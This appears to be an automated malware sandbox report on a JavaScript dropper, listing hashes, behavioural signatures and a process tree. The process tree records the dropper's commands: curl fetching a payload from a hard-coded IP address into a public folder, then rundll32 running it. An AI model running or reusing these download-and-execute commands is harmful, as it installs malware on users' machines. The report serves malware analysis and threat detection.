Analysis
max time kernel: 135s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15/06/2023, 15:24
Static task: static1
Behavioral task behavioral1: sample document_DB798_Jun_15_1.js, resource win7-20230220-en
Behavioral task behavioral2: sample document_DB798_Jun_15_1.js, resource win10v2004-20230220-en
Behavioral task behavioral3: sample document_DB798_Jun_15_2.js, resource win7-20230220-en
Behavioral task behavioral4: sample document_DB798_Jun_15_2.js, resource win10v2004-20230220-en
Behavioral task behavioral5: sample document_DB798_Jun_15_3.js, resource win7-20230220-en
Behavioral task behavioral6: sample document_DB798_Jun_15_3.js, resource win10v2004-20230221-en
General
Target: document_DB798_Jun_15_1.js
Size: 5KB
MD5: ccbcf7f0c1a6cf533bea8c541cec65c8
SHA1: 66508c03201f46e065e78e6cbe01e5715e4f764c
SHA256: d892f064fd53f65d347124c052e58a7c6f317f759a52d4da23aa8a141cd55890
SHA512: e0655d0b9b9b804adb81cf7a27b3f5cd74b6fb84d402a52ed9279cfe88f7ecbe560c0b2d01ed5a98ba87fa780b8c547e5785f3a47300ad42ed8ac4224bd60385
SSDEEP: 96:EVUHZFSYQYGZjTqH8v/2TuFxD78H8v/2TTxDe7MDsyEBD3MTQyeyZqg1WuTQyv3Q:WB/8o/8iB8ZG
Malware Config
Signatures

Blocklisted process makes network request (3 IoCs)
flow | pid | Process
4 | 4352 | wscript.exe
6 | 4352 | wscript.exe
8 | 4352 | wscript.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | wscript.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (6 IoCs)
description | pid | Process | procid_target
PID 4352 wrote to memory of 1676 | 4352 | wscript.exe | 84
PID 4352 wrote to memory of 1676 | 4352 | wscript.exe | 84
PID 4352 wrote to memory of 3800 | 4352 | wscript.exe | 92
PID 4352 wrote to memory of 3800 | 4352 | wscript.exe | 92
PID 3800 wrote to memory of 4416 | 3800 | conhost.exe | 93
PID 3800 wrote to memory of 4416 | 3800 | conhost.exe | 93
Processes

C:\Windows\system32\wscript.exe (PID 4352)
  command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\document_DB798_Jun_15_1.js
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\curl.exe (PID 1676, child of 4352)
    command line: "C:\Windows\System32\curl.exe" -o c:\users\public\tangier.tmp http://158.255.213.54/vMCtB/AD057

  C:\Windows\System32\conhost.exe (PID 3800, child of 4352)
    command line: "C:\Windows\System32\conhost.exe" rundll32.exe c:\users\public\tangier.tmp,must
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\rundll32.exe (PID 4416, child of 3800)
      command line: rundll32.exe c:\users\public\tangier.tmp,must